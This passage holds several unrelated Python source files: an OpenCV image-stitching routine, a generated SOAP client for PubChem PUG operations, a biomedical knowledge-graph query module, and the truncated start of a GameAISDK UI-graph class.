def stitch(self, frame1, frame2):
"""
Responsible for computing homography for and warping images.
Returns a stitched composition of frame1 and frame2.
"""
if self.homography is None:
self.homography = compute_homography(frame1, frame2)
if self.homography is not False:
result = warp_images(frame2, frame1, self.homography)
return result
return None
def show_stitch(self, frame1, frame2):
"""
Responsible for showing a stitch
"""
result = self.stitch(frame1, frame2)
if result is not None:
cv2.imshow('Stitched output', result)
cv2.waitKey()
def reset(self):
"""
Resets the homography of the stitcher to None for stitcher reuse.
"""
self.homography = None
def double_stitch(self, img1, img2, img3): # pylint: disable=unused-argument, no-self-use
"""
TODO: Not implemented
"""
raise Exception('Not implemented')
def compute_matches(frame1, frame2):
"""
Computes the keypoint matches between the provided frames.
"""
# Initialize the SURF detector
surf = cv2.xfeatures2d.SURF_create()
# Extracts the keypoints and descriptors via SURF
keypoints1, descriptors1 = surf.detectAndCompute(frame1, None)
keypoints2, descriptors2 = surf.detectAndCompute(frame2, None)
# Initializes parameters for Flann-based matcher
flann_index_kdtree = 0
index_params = dict(algorithm=flann_index_kdtree, trees=5)
search_params = dict(checks=50)
# Initializes the Flann-based matcher object
flann = cv2.FlannBasedMatcher(index_params, search_params)
# Computes matches using Flann matcher
matches = flann.knnMatch(descriptors1, descriptors2, k=2)
return matches, keypoints1, keypoints2
def compute_homography(frame1, frame2):
"""
Computes homography based on the provided frames.
"""
min_match_count = 20
matches, keypoints1, keypoints2 = compute_matches(frame1, frame2)
# Store all the good matches based on Lowes ratio test
good_matches = []
for match1, match2 in matches:
if match1.distance < 0.7 * match2.distance:
good_matches.append(match1)
if len(good_matches) > min_match_count:
# TextFormatter.print_info("Found %d matches. We need at least %d matches."
# % (len(good_matches), min_match_count))
src_pts = np.float32([keypoints1[good_match.queryIdx].pt
for good_match in good_matches]).reshape(-1, 1, 2)
dst_pts = np.float32([keypoints2[good_match.trainIdx].pt
for good_match in good_matches]).reshape(-1, 1, 2)
homography, _ = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
return homography
else:
# TextFormatter.print_error("Images do not have enough matches to produce homography.")
# TextFormatter.print_info("Found %d matches. We need at least %d matches."
# % (len(good_matches), min_match_count))
return False
def warp_images(img1, img2, homography):
"""
Warps second image to plane of first image based on provided homography.
"""
rows1, cols1 = img1.shape[:2]
rows2, cols2 = img2.shape[:2]
point_list1 = np.float32([[0, 0], [0, rows1], [cols1, rows1], [cols1, 0]]).reshape(-1, 1, 2)
temp_points = np.float32([[0, 0], [0, rows2], [cols2, rows2], [cols2, 0]]).reshape(-1, 1, 2)
point_list2 = cv2.perspectiveTransform(temp_points, homography)
combined_point_list = np.concatenate((point_list1, point_list2), axis=0)
[x_min, y_min] = np.int32(combined_point_list.min(axis=0).ravel() - 0.5)
[x_max, y_max] = np.int32(combined_point_list.max(axis=0).ravel() + 0.5)
translation_dist = [-x_min, -y_min]
homography_translation = np.array([[1, 0, translation_dist[0]],
[0, 1, translation_dist[1]], [0, 0, 1]])
output_img = cv2.warpPerspective(img2, homography_translation.dot(homography), # pylint: disable=no-member
(x_max-x_min, y_max-y_min))
output_img[translation_dist[1]:rows1+translation_dist[1],
translation_dist[0]:cols1+translation_dist[0]] = img1
return output_img
|
##################################################
# PUG_services.py
# generated by ZSI.generate.wsdl2python
##################################################
from PUG_services_types import *
import urlparse, types
from ZSI.TCcompound import ComplexType, Struct
from ZSI import client
import ZSI
from ZSI.generate.pyclass import pyclass_type
# Locator
class PUGLocator:
PUGSoap_address = "http://127.0.0.1:9000/pug_soap/pug_soap.cgi"
def getPUGSoapAddress(self):
return PUGLocator.PUGSoap_address
def getPUGSoap(self, url=None, **kw):
return PUGSoapSOAP(url or PUGLocator.PUGSoap_address, **kw)
# Methods
class PUGSoapSOAP:
def __init__(self, url, **kw):
kw.setdefault("readerclass", None)
kw.setdefault("writerclass", None)
# no resource properties
self.binding = client.Binding(url=url, **kw)
# no ws-addressing
# op: AssayDownload
def AssayDownload(self, request):
if isinstance(request, AssayDownloadSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/AssayDownload", **kw)
# no output wsaction
response = self.binding.Receive(AssayDownloadSoapOut.typecode)
return response
# op: Download
def Download(self, request):
if isinstance(request, DownloadSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/Download", **kw)
# no output wsaction
response = self.binding.Receive(DownloadSoapOut.typecode)
return response
# op: GetAssayColumnDescription
def GetAssayColumnDescription(self, request):
if isinstance(request, GetAssayColumnDescriptionSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetAssayColumnDescription", **kw)
# no output wsaction
response = self.binding.Receive(GetAssayColumnDescriptionSoapOut.typecode)
return response
# op: GetAssayColumnDescriptions
def GetAssayColumnDescriptions(self, request):
if isinstance(request, GetAssayColumnDescriptionsSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetAssayColumnDescriptions", **kw)
# no output wsaction
response = self.binding.Receive(GetAssayColumnDescriptionsSoapOut.typecode)
return response
# op: GetAssayDescription
def GetAssayDescription(self, request):
if isinstance(request, GetAssayDescriptionSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetAssayDescription", **kw)
# no output wsaction
response = self.binding.Receive(GetAssayDescriptionSoapOut.typecode)
return response
# op: GetDownloadUrl
def GetDownloadUrl(self, request):
if isinstance(request, GetDownloadUrlSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetDownloadUrl", **kw)
# no output wsaction
response = self.binding.Receive(GetDownloadUrlSoapOut.typecode)
return response
# op: GetEntrezKey
def GetEntrezKey(self, request):
if isinstance(request, GetEntrezKeySoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetEntrezKey", **kw)
# no output wsaction
response = self.binding.Receive(GetEntrezKeySoapOut.typecode)
return response
# op: GetEntrezUrl
def GetEntrezUrl(self, request):
if isinstance(request, GetEntrezUrlSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetEntrezUrl", **kw)
# no output wsaction
response = self.binding.Receive(GetEntrezUrlSoapOut.typecode)
return response
# op: GetIDList
def GetIDList(self, request):
if isinstance(request, GetIDListSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetIDList", **kw)
# no output wsaction
response = self.binding.Receive(GetIDListSoapOut.typecode)
return response
# op: GetListItemsCount
def GetListItemsCount(self, request):
if isinstance(request, GetListItemsCountSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetListItemsCount", **kw)
# no output wsaction
response = self.binding.Receive(GetListItemsCountSoapOut.typecode)
return response
# op: GetOperationStatus
def GetOperationStatus(self, request):
if isinstance(request, GetOperationStatusSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetOperationStatus", **kw)
# no output wsaction
response = self.binding.Receive(GetOperationStatusSoapOut.typecode)
return response
# op: GetStandardizedCID
def GetStandardizedCID(self, request):
if isinstance(request, GetStandardizedCIDSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetStandardizedCID", **kw)
# no output wsaction
response = self.binding.Receive(GetStandardizedCIDSoapOut.typecode)
return response
# op: GetStandardizedStructure
def GetStandardizedStructure(self, request):
if isinstance(request, GetStandardizedStructureSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetStandardizedStructure", **kw)
# no output wsaction
response = self.binding.Receive(GetStandardizedStructureSoapOut.typecode)
return response
# op: GetStandardizedStructureBase64
def GetStandardizedStructureBase64(self, request):
if isinstance(request, GetStandardizedStructureBase64SoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetStandardizedStructureBase64", **kw)
# no output wsaction
response = self.binding.Receive(GetStandardizedStructureBase64SoapOut.typecode)
return response
# op: GetStatusMessage
def GetStatusMessage(self, request):
if isinstance(request, GetStatusMessageSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/GetStatusMessage", **kw)
# no output wsaction
response = self.binding.Receive(GetStatusMessageSoapOut.typecode)
return response
# op: IdentitySearch
def IdentitySearch(self, request):
if isinstance(request, IdentitySearchSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/IdentitySearch", **kw)
# no output wsaction
response = self.binding.Receive(IdentitySearchSoapOut.typecode)
return response
# op: IDExchange
def IDExchange(self, request):
if isinstance(request, IDExchangeSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/IDExchange", **kw)
# no output wsaction
response = self.binding.Receive(IDExchangeSoapOut.typecode)
return response
# op: InputAssay
def InputAssay(self, request):
if isinstance(request, InputAssaySoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/InputAssay", **kw)
# no output wsaction
response = self.binding.Receive(InputAssaySoapOut.typecode)
return response
# op: InputEntrez
def InputEntrez(self, request):
if isinstance(request, InputEntrezSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/InputEntrez", **kw)
# no output wsaction
response = self.binding.Receive(InputEntrezSoapOut.typecode)
return response
# op: InputList
def InputList(self, request):
if isinstance(request, InputListSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/InputList", **kw)
# no output wsaction
response = self.binding.Receive(InputListSoapOut.typecode)
return response
# op: InputListString
def InputListString(self, request):
if isinstance(request, InputListStringSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/InputListString", **kw)
# no output wsaction
response = self.binding.Receive(InputListStringSoapOut.typecode)
return response
# op: InputListText
def InputListText(self, request):
if isinstance(request, InputListTextSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/InputListText", **kw)
# no output wsaction
response = self.binding.Receive(InputListTextSoapOut.typecode)
return response
# op: InputStructure
def InputStructure(self, request):
if isinstance(request, InputStructureSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/InputStructure", **kw)
# no output wsaction
response = self.binding.Receive(InputStructureSoapOut.typecode)
return response
# op: InputStructureBase64
def InputStructureBase64(self, request):
if isinstance(request, InputStructureBase64SoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/InputStructureBase64", **kw)
# no output wsaction
response = self.binding.Receive(InputStructureBase64SoapOut.typecode)
return response
# op: MFSearch
def MFSearch(self, request):
if isinstance(request, MFSearchSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/MFSearch", **kw)
# no output wsaction
response = self.binding.Receive(MFSearchSoapOut.typecode)
return response
# op: ScoreMatrix
def ScoreMatrix(self, request):
if isinstance(request, ScoreMatrixSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/ScoreMatrix", **kw)
# no output wsaction
response = self.binding.Receive(ScoreMatrixSoapOut.typecode)
return response
# op: SimilaritySearch2D
def SimilaritySearch2D(self, request):
if isinstance(request, SimilaritySearch2DSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/SimilaritySearch2D", **kw)
# no output wsaction
response = self.binding.Receive(SimilaritySearch2DSoapOut.typecode)
return response
# op: Standardize
def Standardize(self, request):
if isinstance(request, StandardizeSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/Standardize", **kw)
# no output wsaction
response = self.binding.Receive(StandardizeSoapOut.typecode)
return response
# op: SubstructureSearch
def SubstructureSearch(self, request):
if isinstance(request, SubstructureSearchSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/SubstructureSearch", **kw)
# no output wsaction
response = self.binding.Receive(SubstructureSearchSoapOut.typecode)
return response
# op: SuperstructureSearch
def SuperstructureSearch(self, request):
if isinstance(request, SuperstructureSearchSoapIn) is False:
raise TypeError, "%s incorrect request type" % (request.__class__)
kw = {}
# no input wsaction
self.binding.Send(None, None, request, soapaction="http://127.0.0.1:9000/SuperstructureSearch", **kw)
# no output wsaction
response = self.binding.Receive(SuperstructureSearchSoapOut.typecode)
return response
AssayDownloadSoapIn = ns0.AssayDownload_Dec().pyclass
AssayDownloadSoapOut = ns0.AssayDownloadResponse_Dec().pyclass
DownloadSoapIn = ns0.Download_Dec().pyclass
DownloadSoapOut = ns0.DownloadResponse_Dec().pyclass
GetAssayColumnDescriptionSoapIn = ns0.GetAssayColumnDescription_Dec().pyclass
GetAssayColumnDescriptionSoapOut = ns0.GetAssayColumnDescriptionResponse_Dec().pyclass
GetAssayColumnDescriptionsSoapIn = ns0.GetAssayColumnDescriptions_Dec().pyclass
GetAssayColumnDescriptionsSoapOut = ns0.GetAssayColumnDescriptionsResponse_Dec().pyclass
GetAssayDescriptionSoapIn = ns0.GetAssayDescription_Dec().pyclass
GetAssayDescriptionSoapOut = ns0.GetAssayDescriptionResponse_Dec().pyclass
GetDownloadUrlSoapIn = ns0.GetDownloadUrl_Dec().pyclass
GetDownloadUrlSoapOut = ns0.GetDownloadUrlResponse_Dec().pyclass
GetEntrezKeySoapIn = ns0.GetEntrezKey_Dec().pyclass
GetEntrezKeySoapOut = ns0.GetEntrezKeyResponse_Dec().pyclass
GetEntrezUrlSoapIn = ns0.GetEntrezUrl_Dec().pyclass
GetEntrezUrlSoapOut = ns0.GetEntrezUrlResponse_Dec().pyclass
GetIDListSoapIn = ns0.GetIDList_Dec().pyclass
GetIDListSoapOut = ns0.GetIDListResponse_Dec().pyclass
GetListItemsCountSoapIn = ns0.GetListItemsCount_Dec().pyclass
GetListItemsCountSoapOut = ns0.GetListItemsCountResponse_Dec().pyclass
GetOperationStatusSoapIn = ns0.GetOperationStatus_Dec().pyclass
GetOperationStatusSoapOut = ns0.GetOperationStatusResponse_Dec().pyclass
GetStandardizedCIDSoapIn = ns0.GetStandardizedCID_Dec().pyclass
GetStandardizedCIDSoapOut = ns0.GetStandardizedCIDResponse_Dec().pyclass
GetStandardizedStructureSoapIn = ns0.GetStandardizedStructure_Dec().pyclass
GetStandardizedStructureSoapOut = ns0.GetStandardizedStructureResponse_Dec().pyclass
GetStandardizedStructureBase64SoapIn = ns0.GetStandardizedStructureBase64_Dec().pyclass
GetStandardizedStructureBase64SoapOut = ns0.GetStandardizedStructureBase64Response_Dec().pyclass
GetStatusMessageSoapIn = ns0.GetStatusMessage_Dec().pyclass
GetStatusMessageSoapOut = ns0.GetStatusMessageResponse_Dec().pyclass
IdentitySearchSoapIn = ns0.IdentitySearch_Dec().pyclass
IdentitySearchSoapOut = ns0.IdentitySearchResponse_Dec().pyclass
IDExchangeSoapIn = ns0.IDExchange_Dec().pyclass
IDExchangeSoapOut = ns0.IDExchangeResponse_Dec().pyclass
InputAssaySoapIn = ns0.InputAssay_Dec().pyclass
InputAssaySoapOut = ns0.InputAssayResponse_Dec().pyclass
InputEntrezSoapIn = ns0.InputEntrez_Dec().pyclass
InputEntrezSoapOut = ns0.InputEntrezResponse_Dec().pyclass
InputListSoapIn = ns0.InputList_Dec().pyclass
InputListSoapOut = ns0.InputListResponse_Dec().pyclass
InputListStringSoapIn = ns0.InputListString_Dec().pyclass
InputListStringSoapOut = ns0.InputListStringResponse_Dec().pyclass
InputListTextSoapIn = ns0.InputListText_Dec().pyclass
InputListTextSoapOut = ns0.InputListTextResponse_Dec().pyclass
InputStructureSoapIn = ns0.InputStructure_Dec().pyclass
InputStructureSoapOut = ns0.InputStructureResponse_Dec().pyclass
InputStructureBase64SoapIn = ns0.InputStructureBase64_Dec().pyclass
InputStructureBase64SoapOut = ns0.InputStructureBase64Response_Dec().pyclass
MFSearchSoapIn = ns0.MFSearch_Dec().pyclass
MFSearchSoapOut = ns0.MFSearchResponse_Dec().pyclass
ScoreMatrixSoapIn = ns0.ScoreMatrix_Dec().pyclass
ScoreMatrixSoapOut = ns0.ScoreMatrixResponse_Dec().pyclass
SimilaritySearch2DSoapIn = ns0.SimilaritySearch2D_Dec().pyclass
SimilaritySearch2DSoapOut = ns0.SimilaritySearch2DResponse_Dec().pyclass
StandardizeSoapIn = ns0.Standardize_Dec().pyclass
StandardizeSoapOut = ns0.StandardizeResponse_Dec().pyclass
SubstructureSearchSoapIn = ns0.SubstructureSearch_Dec().pyclass
SubstructureSearchSoapOut = ns0.SubstructureSearchResponse_Dec().pyclass
SuperstructureSearchSoapIn = ns0.SuperstructureSearch_Dec().pyclass
SuperstructureSearchSoapOut = ns0.SuperstructureSearchResponse_Dec().pyclass
|
import json
from dug.utils import biolink_snake_case
class MissingNodeReferenceError(BaseException):
pass
class MissingEdgeReferenceError(BaseException):
pass
class QueryKG:
def __init__(self, kg_json):
self.kg = kg_json["message"]
self.answers = self.kg.get("results", [])
self.question = self.kg.get("query_graph", {})
self.nodes = self.kg.get("knowledge_graph", {}).get("nodes") # {node["id"]: node for node in kg_json.get('knowledge_graph', {}).get('nodes', [])}
self.edges = self.kg.get("knowledge_graph", {}).get("edges") # {edge["id"]: edge for edge in kg_json.get('knowledge_graph', {}).get('edges', [])}
def get_answer_subgraph(self, answer, include_node_keys=[], include_edge_keys=[]):
# Get answer nodes
answer_nodes = {}
for binding_id, binding_nodes in answer["node_bindings"].items():
# Add node info for each node included in answer graph
for answer_node in binding_nodes:
# Throw error if node doesn't actually exist in 'nodes' section of knowledge graph
if answer_node["id"] not in self.nodes:
err_msg = f"Unable to assemble subraph for answer:\n{json.dumps(answer, indent=2)}\n" \
f"Parent graph doesn't contain node info for: {answer_node}"
raise MissingNodeReferenceError(err_msg)
# Add only node info that you actually want
answer_nodes[answer_node["id"]] = self.get_node(answer_node["id"], include_node_keys)
# Get answer edges
answer_edges = {}
for binding_id, binding_edges in answer["edge_bindings"].items():
# Add edge info for each edge included in answer graph
for answer_edge in binding_edges:
# Throw error if edge doesn't actually exist in 'edges' section of knowledge graph
if answer_edge["id"] not in self.edges:
err_msg = f"Unable to assemble subraph for answer:\n{json.dumps(answer, indent=2)}\n" \
f"Parent graph doesn't contain edge info for: {answer_edge}"
raise MissingEdgeReferenceError(err_msg)
# Add only information from edge that you actually want
answer_edges[answer_edge["id"]] = self.get_edge(answer_edge["id"], include_edge_keys)
kg = {"message":{
"knowledge_graph": {
"nodes": answer_nodes,
"edges": answer_edges
},
"results": [answer],
"query_graph": self.question
}
}
return QueryKG(kg)
def _parse_attributes(self, kg_component):
"""
Extracts attributes to normal dict from Trapi 1.0 KG nodes / edges
Trapi 1.0 has {"id": "xxx", "name": "xxx", "attributes" : {"name": "publication", "value": "xxx",...}}
:param kg_component: Dict representing a node or an edge
:return:
"""
return {attr["name"]: attr["value"] for attr in kg_component.get("attributes", {})}
def get_node(self, node_id, include_node_keys=[]):
# Return node with optionally subsetted information
# Trapi 1.0 has {"id": "xxx", "name": "xxx", "attributes" : [{"name": "publication", "value": "xxx"...}, {},...]}
node = self._parse_attributes(self.nodes[node_id])
node.update({k: v for k, v in self.nodes[node_id].items() if k != "attributes"})
node["id"] = node_id
node["name"] = self.nodes[node_id].get("name", "")
# Optionally subset to get only certain information columns
if include_node_keys:
node = {key: node.get(key) for key in include_node_keys}
return node
def get_edge(self, edge_id, include_edge_keys=[]):
# Return edge with optionally subsetted information
edge = self._parse_attributes(self.edges[edge_id])
edge.update({k: v for k, v in self.edges[edge_id].items() if k != "attributes"})
edge["id"] = edge_id
edge["publications"] = edge.get("publications", [])
if isinstance(edge["publications"], str):
edge["publications"] = [edge["publications"]]
# Optionally subset to include only certain info
if include_edge_keys:
edge = {key: edge.get(key) for key in include_edge_keys}
return edge
def get_nodes(self):
nodes_dict = self.kg.get("knowledge_graph", {}).get("nodes", {})
return [self.get_node(curie) for curie in nodes_dict]
def get_edges(self):
edges_dict = self.kg.get("knowledge_graph", {}).get("edges", {})
return [self.get_edge(kg_id) for kg_id in edges_dict]
def get_node_names(self, include_curie=True):
node_names = []
curie_ids = self.get_curie_ids()
for node in self.get_nodes():
if include_curie or node['id'] not in curie_ids:
node_names.append(node['name'])
return node_names
def get_node_synonyms(self, include_curie=True):
node_synonyms = []
curie_ids = self.get_curie_ids()
for node in self.get_nodes():
if include_curie or node['id'] not in curie_ids:
node_synonyms += node.get('synonyms') or []
return node_synonyms
def get_curie_ids(self):
question_nodes_dict = self.question.get('nodes', {})
return [question_nodes_dict[node]['id'] for node in question_nodes_dict if 'id' in question_nodes_dict[node]]
def get_kg(self):
# Parse out the KG in whatever form we want
# TODO: Make this parse out old-style json so ui doesn't break
old_kg_model = {
"knowledge_map": [],
"knowledge_graph": {
"nodes": [],
"edges": [],
},
"question_graph": {
"nodes": [],
"edges": []
}
}
query_graph = self.kg.get("query_graph")
for q_id in query_graph["nodes"]:
node_details = query_graph["nodes"][q_id]
node_curie = node_details.get("id", "")
node_type = [self._snake_case(x.replace('biolink:', '')) for x in node_details.get("category", [])]
old_node = {"id": q_id, "type": node_type}
if node_curie:
old_node.update({"curie": node_curie})
old_kg_model["question_graph"]["nodes"].append(old_node)
for q_id in query_graph["edges"]:
edge_details = query_graph["edges"][q_id]
old_edge = {"id": q_id, "source_id": edge_details["subject"], "target_id": edge_details["object"]}
edge_type = edge_details.get("predicate")
if edge_type:
old_edge.update({"type": edge_type})
old_kg_model["question_graph"]["edges"].append(old_edge)
results = self.kg.get("results")
for bindings in results:
old_binding = {}
for binding_type in bindings:
for q_id in bindings[binding_type]:
kg_ids = [x["id"] for x in bindings[binding_type][q_id]]
old_binding[binding_type] = old_binding.get(binding_type, {})
old_binding[binding_type][q_id] = old_binding[binding_type].get(q_id,[])
old_binding[binding_type][q_id] = kg_ids
old_kg_model["knowledge_map"].append(old_binding)
old_kg_model["knowledge_graph"]["nodes"] = self.get_nodes()
for node in old_kg_model["knowledge_graph"]["nodes"]:
# adds id for node name if no name is present
node["name"] = node["name"] if node["name"] else node["id"]
old_kg_model["knowledge_graph"]["edges"] = self.get_edges()
for edge in old_kg_model["knowledge_graph"]["edges"]:
# adds predicate as type for edges
edge["type"] = edge["predicate"]
# source_id and target_id should always be str
edge["source_id"] = edge["subject"]
edge["target_id"] = edge["object"]
return old_kg_model
def _snake_case(self, arg: str):
return biolink_snake_case(arg)
class InvalidQueryError(BaseException):
pass
class QueryFactory:
# Class member list of valid data types that can be included in query
data_types = ["publication", "phenotypic_feature", "gene", "disease", "chemical_substance",
"drug_exposure", "biological_process", "anatomical_entity", "small_molecule",
"chemical_mixture", "chemical_entity"]
# List of curie prefixes that are valid for certain curie types
curie_map = {"disease": ["MONDO", "ORPHANET", "DOID"],
"phenotypic_feature": ["HP", "HPO", "EFO"],
"gene": ["HGNC", "NCBIGene"],
"chemical_substance": ["CHEBI", "PUBCHEM.COMPOUND", "CHEMBL.COMPOUND"],
"chemical_mixture": ["CHEBI", "PUBCHEM.COMPOUND", "CHEMBL.COMPOUND"],
"chemical_entity": ["CHEBI", "PUBCHEM.COMPOUND", "CHEMBL.COMPOUND"],
"small_molecule": ["CHEBI", "PUBCHEM.COMPOUND", "CHEMBL.COMPOUND"],
"anatomical_entity": ["UBERON"]}
def __init__(self, question_graph, source, curie_index=0):
# List of terms that are going to be connected to make a query
self.question_graph = question_graph
# Index in question graph that will be matched against curies
self.curie_index = curie_index
# Query source (e.g. /schema or /graph/gamma/quick)
self.source = source
# Check to make sure curie index isn't out of range
if self.curie_index >= len(self.question_graph):
raise InvalidQueryError(f"Invalid query index ({curie_index})! Question graph only "
f"contains {len(self.question_graph)} entries!")
# Set the type of the curie for downstream curie checking
self.curie_type = self.question_graph[self.curie_index]
# Validate that all entries in question graph are actually valid types
self.validate_factory()
def validate_factory(self):
# Check to make sure all the question types are valid
for question in self.question_graph:
if not question in QueryFactory.data_types:
raise InvalidQueryError(f"Query contains invalid query type: {question}")
def is_valid_curie(self, curie):
# Return whether a curie can be used to create a valid query
# Handle case where curie type has no limitations
if self.curie_type not in QueryFactory.curie_map:
return True
# Otherwise only return true if current query contains one of the acceptable prefixes
for curie_prefix in QueryFactory.curie_map[self.curie_type]:
if curie.startswith(curie_prefix):
return True
# Curie doesn't start with an acceptable prefix
return False
def get_query(self, curie):
# Return nothing if not valid curie
if not self.is_valid_curie(curie):
return None
question = []
seen = []
curie_id = ""
for i in range(len(self.question_graph)):
query_type = self.question_graph[i]
if self.question_graph.count(query_type) > 1:
# Add alias to beginning of types we've seen before
alias = f"{query_type[0:3]}{len([x for x in seen if x == query_type])}"
query = f"{alias}:{query_type}"
else:
alias = query_type
query = query_type
# Set curie id to the alias if this is the correct index
if i == self.curie_index:
curie_id = alias
# Append to list of query_types currently in query
seen.append(query_type)
# Append to list of actual terms that will appear in query
question.append(query)
# Build and return query
return f"select {'->'.join(question)} from '{self.source}' where {curie_id}='{curie}'"
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import logging
from math import sqrt
import math
import cv2
from PyQt5.QtGui import QColor, QImage, QPixmap, QPen, QPainterPath
from PyQt5.QtCore import Qt
import networkx as nx
from ....utils import set_log_text
from .arrow_line import ArrowLine
WIDTH = 1280
HEIGHT = 720
UIGRAPH = 1000
DEFAULT_SELECT_IMG_FILL_COLOR = QColor(0, 128, 255, 155)
DEFAULT_SELECT_EDGE_FILL_COLOR = QColor(128, 0, 255, 155)
DEFAULT_SELECT_EDGE_PEN_WIDTH = 5
DEFAULT_PAINT_EDGE_IMG_SCALE = 0.3
DEFAULT_PAINT_NODE_IMG_SCALE = 0.5
DEFAULT_ROOT_NODE = 'group0_scene0.jpg'
DEFAULT_CANVAS_WIDTH = 10
DEFAULT_CANVAS_HEIGHT = 10
# DEFAULT_CELL_X = 67
DEFAULT_CELL_X = 100
DEFAULT_CELL_Y = 55
DEFAULT_IMAGE_SCALE = 0.045
class UIGraph(object):
def __init__(self):
self.__graph = nx.DiGraph()
self.__node_pos = dict()
self.__node_sub_graph = dict()
self.__node_images = dict()
self.__node_pix_map = dict()
self.__node_neighbors = dict()
self.__node_buttons = dict()
self.__scale = 1.0
self.__high_light_node = None
self.__select_node = None
self.__show_image_flag = False
self.__show_path_flag = False
self.__edge_lines = list()
self.__high_light_edge = None
self.__select_edge = None
self.__text_edit = None
self.__text_content = None
self.__windows_scale = (1.0, 1.0)
self.__canvas_scale = 1
self.__painter_width = 0
self.__painter_height = 0
self.__logger = logging.getLogger('sdktool')
def process(self):
# save direct neighbors for each node
try:
self._neighbors2()
# position each node
self._pos_nodes()
# scale for each node image
self.__scale = DEFAULT_IMAGE_SCALE
except RuntimeError as e:
self.__logger.error("graph process error:%s, please reload graph", e)
def _pos_nodes(self):
nodes = self.__graph.nodes
groups = {}
for node in nodes:
# node name is groupXX_sceneXX.jpg, like: group0_scene0.jpg
name = str(node)
# groupXX_sceneXX
base_name = name[:-4]
sub_names = base_name.split('_')
group_id = int(sub_names[0][5:])
if groups.get(group_id) is None:
groups[group_id] = []
groups[group_id].append(node)
group_ids = groups.keys()
# number of group_id
# max number of scene in all groups
length_list = [len(groups.get(gid)) for gid in group_ids]
length_list.append(1)
cell_x = int(DEFAULT_CELL_X * self.__canvas_scale)
cell_y = int(DEFAULT_CELL_Y * self.__canvas_scale)
col = 1
self.__painter_width = 0
self.__painter_height = 0
for gid in group_ids:
cur_pos_x = col * cell_x
cur_pos_y = HEIGHT / 2
